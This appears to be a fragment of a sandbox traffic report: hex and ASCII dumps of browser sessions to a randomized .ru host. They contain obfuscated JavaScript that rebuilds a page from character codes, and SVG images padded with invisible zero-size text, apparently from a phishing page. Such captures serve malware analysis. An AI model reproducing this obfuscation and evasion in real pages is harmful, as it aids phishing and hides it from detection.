                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 36 5d 20 3d 20 31 30 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 37 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 38 5d 20 3d 20 31 31 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 39 5d 20 3d 20 33 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 30 5d 20 3d 20 33 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 5d 20 3d 20 31 30 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 32 5d 20 3d 20 39 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 33 5d 20 3d 20 31 31 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 34 5d 20 3d 20 31 30 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 35 5d 20 3d 20 36 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 5d 20
                                                                                                                                                                                    Data Ascii: ;EWRfgvqIjLXb[26] = 108;EWRfgvqIjLXb[27] = 116;EWRfgvqIjLXb[28] = 114;EWRfgvqIjLXb[29] = 34;EWRfgvqIjLXb[30] = 32;EWRfgvqIjLXb[31] = 108;EWRfgvqIjLXb[32] = 97;EWRfgvqIjLXb[33] = 110;EWRfgvqIjLXb[34] = 103;EWRfgvqIjLXb[35] = 61;EWRfgvqIjLXb[36]
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 34 5d 20 3d 20 31 30 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 35 5d 20 3d 20 31 30 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 36 5d 20 3d 20 31 31 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 37 5d 20 3d 20 31 30 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 38 5d 20 3d 20 39 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 39 5d 20 3d 20 31 30 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39 30 5d 20 3d 20 34 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39 31 5d 20 3d 20 31 31 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39 32 5d 20 3d 20 31 30 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39 33 5d 20 3d 20 31 30 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39
                                                                                                                                                                                    Data Ascii: 1;EWRfgvqIjLXb[84] = 100;EWRfgvqIjLXb[85] = 101;EWRfgvqIjLXb[86] = 118;EWRfgvqIjLXb[87] = 105;EWRfgvqIjLXb[88] = 99;EWRfgvqIjLXb[89] = 101;EWRfgvqIjLXb[90] = 45;EWRfgvqIjLXb[91] = 119;EWRfgvqIjLXb[92] = 105;EWRfgvqIjLXb[93] = 100;EWRfgvqIjLXb[9
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 71 49 6a 4c 58 62 5b 31 34 30 5d 20 3d 20 31 30 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 31 5d 20 3d 20 31 30 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 32 5d 20 3d 20 31 31 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 33 5d 20 3d 20 31 30 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 34 5d 20 3d 20 33 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 35 5d 20 3d 20 31 30 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 36 5d 20 3d 20 31 31 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 37 5d 20 3d 20 31 30 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 38 5d 20 3d 20 31 30 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 34 39 5d 20 3d 20 36 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b
                                                                                                                                                                                    Data Ascii: qIjLXb[140] = 108;EWRfgvqIjLXb[141] = 105;EWRfgvqIjLXb[142] = 110;EWRfgvqIjLXb[143] = 107;EWRfgvqIjLXb[144] = 32;EWRfgvqIjLXb[145] = 104;EWRfgvqIjLXb[146] = 114;EWRfgvqIjLXb[147] = 101;EWRfgvqIjLXb[148] = 102;EWRfgvqIjLXb[149] = 61;EWRfgvqIjLXb[
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 39 36 5d 20 3d 20 31 31 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 39 37 5d 20 3d 20 39 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 39 38 5d 20 3d 20 31 31 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 39 39 5d 20 3d 20 31 30 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 30 5d 20 3d 20 31 31 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 31 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 32 5d 20 3d 20 33 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 33 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 34 5d 20 3d 20 31 32 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 30 35 5d 20 3d 20 31 31 32 3b 0a 45 57 52 66 67
                                                                                                                                                                                    Data Ascii: ;EWRfgvqIjLXb[196] = 115;EWRfgvqIjLXb[197] = 99;EWRfgvqIjLXb[198] = 114;EWRfgvqIjLXb[199] = 105;EWRfgvqIjLXb[200] = 112;EWRfgvqIjLXb[201] = 116;EWRfgvqIjLXb[202] = 32;EWRfgvqIjLXb[203] = 116;EWRfgvqIjLXb[204] = 121;EWRfgvqIjLXb[205] = 112;EWRfg
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 20 3d 20 31 31 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 32 5d 20 3d 20 31 31 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 33 5d 20 3d 20 31 30 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 34 5d 20 3d 20 36 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 35 5d 20 3d 20 38 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 36 5d 20 3d 20 36 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 37 5d 20 3d 20 33 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 38 5d 20 3d 20 36 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 35 39 5d 20 3d 20 36 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 36 30 5d 20 3d 20 34 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 36 31 5d 20 3d 20 31 31 35 3b 0a 45 57 52 66
                                                                                                                                                                                    Data Ascii: = 111;EWRfgvqIjLXb[252] = 110;EWRfgvqIjLXb[253] = 107;EWRfgvqIjLXb[254] = 66;EWRfgvqIjLXb[255] = 88;EWRfgvqIjLXb[256] = 69;EWRfgvqIjLXb[257] = 34;EWRfgvqIjLXb[258] = 62;EWRfgvqIjLXb[259] = 60;EWRfgvqIjLXb[260] = 47;EWRfgvqIjLXb[261] = 115;EWRf
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 66 67 76 71 49 6a 4c 58 62 5b 33 30 37 5d 20 3d 20 39 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 30 38 5d 20 3d 20 31 31 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 30 39 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 30 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 31 5d 20 3d 20 31 31 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 32 5d 20 3d 20 31 30 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 33 5d 20 3d 20 35 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 34 5d 20 3d 20 34 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 35 5d 20 3d 20 31 32 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 31 36 5d 20 3d 20 39 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62
                                                                                                                                                                                    Data Ascii: fgvqIjLXb[307] = 98;EWRfgvqIjLXb[308] = 111;EWRfgvqIjLXb[309] = 116;EWRfgvqIjLXb[310] = 116;EWRfgvqIjLXb[311] = 111;EWRfgvqIjLXb[312] = 109;EWRfgvqIjLXb[313] = 58;EWRfgvqIjLXb[314] = 48;EWRfgvqIjLXb[315] = 125;EWRfgvqIjLXb[316] = 98;EWRfgvqIjLXb
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 33 5d 20 3d 20 34 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 34 5d 20 3d 20 35 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 35 5d 20 3d 20 35 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 36 5d 20 3d 20 35 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 37 5d 20 3d 20 34 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 38 5d 20 3d 20 35 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 36 39 5d 20 3d 20 35 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 37 30 5d 20 3d 20 35 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 37 31 5d 20 3d 20 34 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 37 32 5d 20 3d 20 34 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62
                                                                                                                                                                                    Data Ascii: 3;EWRfgvqIjLXb[363] = 44;EWRfgvqIjLXb[364] = 50;EWRfgvqIjLXb[365] = 53;EWRfgvqIjLXb[366] = 53;EWRfgvqIjLXb[367] = 44;EWRfgvqIjLXb[368] = 50;EWRfgvqIjLXb[369] = 53;EWRfgvqIjLXb[370] = 53;EWRfgvqIjLXb[371] = 44;EWRfgvqIjLXb[372] = 46;EWRfgvqIjLXb
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 3d 20 31 31 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 31 39 5d 20 3d 20 39 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 30 5d 20 3d 20 31 30 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 31 5d 20 3d 20 31 30 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 32 5d 20 3d 20 31 31 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 33 5d 20 3d 20 31 31 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 34 5d 20 3d 20 35 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 35 5d 20 3d 20 35 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 36 5d 20 3d 20 34 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 37 5d 20 3d 20 31 31 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 32 38 5d 20 3d 20 31 32 30 3b 0a 45 57
                                                                                                                                                                                    Data Ascii: = 114;EWRfgvqIjLXb[419] = 97;EWRfgvqIjLXb[420] = 100;EWRfgvqIjLXb[421] = 105;EWRfgvqIjLXb[422] = 117;EWRfgvqIjLXb[423] = 115;EWRfgvqIjLXb[424] = 58;EWRfgvqIjLXb[425] = 50;EWRfgvqIjLXb[426] = 48;EWRfgvqIjLXb[427] = 112;EWRfgvqIjLXb[428] = 120;EW
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 6a 4c 58 62 5b 34 37 34 5d 20 3d 20 39 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 37 35 5d 20 3d 20 31 30 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 37 36 5d 20 3d 20 31 31 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 37 37 5d 20 3d 20 31 31 36 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 37 38 5d 20 3d 20 31 30 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 37 39 5d 20 3d 20 31 31 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 38 30 5d 20 3d 20 31 32 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 38 31 5d 20 3d 20 33 35 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 38 32 5d 20 3d 20 31 30 32 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 38 33 5d 20 3d 20 31 31 31 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 38
                                                                                                                                                                                    Data Ascii: jLXb[474] = 99;EWRfgvqIjLXb[475] = 101;EWRfgvqIjLXb[476] = 110;EWRfgvqIjLXb[477] = 116;EWRfgvqIjLXb[478] = 101;EWRfgvqIjLXb[479] = 114;EWRfgvqIjLXb[480] = 125;EWRfgvqIjLXb[481] = 35;EWRfgvqIjLXb[482] = 102;EWRfgvqIjLXb[483] = 111;EWRfgvqIjLXb[48


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    70192.168.2.1649819172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC459OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6py3MCJoa2541Lb6/6Q7zPL1PIdTL1B HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:16 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:16 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=idJBN1b%2FCztKaEAbowF2AyOzobMlIrkwFqoJVPHeMYGKdlcd7objAr%2B8DlCLjBrW45tYzmM9VqoO966MiNH1pqLLgYWsDgVJQV5LzgcwM9kWBTjOa3J5BH5DcO41v1HMEnXynSxUVPCABAtJv5y%2BoL5IoB4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d9e0bf0ad62-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:16 UTC649INData Raw: 39 39 34 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 55 53 4c 7a 35 4c 4a 6e 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63
                                                                                                                                                                                    Data Ascii: 994<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">USLz5LJn</text><span style="display: inline; c
                                                                                                                                                                                    2024-01-26 13:42:16 UTC1369INData Raw: 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 39 66 49 48 44 34 41 46 53 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32 31 39 2d 31 2e 37 31
                                                                                                                                                                                    Data Ascii: ); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">9fIHD4AFS</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.71
                                                                                                                                                                                    2024-01-26 13:42:16 UTC441INData Raw: 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d
                                                                                                                                                                                    Data Ascii: 2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-
                                                                                                                                                                                    2024-01-26 13:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    71192.168.2.1649820172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC454OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQ HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:16 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:16 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LEvKqFIRaQDcufkMPW0if8O4KLOSrqTcYIIdOywCwv7bpBuLgAbFOeG6DwiwHvmNbWTi9k8TZZ2e%2B2h36hmZvCNCFm4vF7EkJU8ZKgG3hsv0f3QBeCz6GnJxV5caJqeHaopAvrj%2FoNN%2BRFO4P8hRBpbUXn8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d9e885853b7-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:16 UTC649INData Raw: 34 31 33 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 36 69 6a 33 4e 34 75 30 38 4d 78 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: 413<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6ij3N4u08Mx</span><span style="display: inline
                                                                                                                                                                                    2024-01-26 13:42:16 UTC401INData Raw: 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f 3e 3c 73
                                                                                                                                                                                    Data Ascii: 78H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/><s
                                                                                                                                                                                    2024-01-26 13:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    72192.168.2.1649821172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC448OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urr HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:16 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:16 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
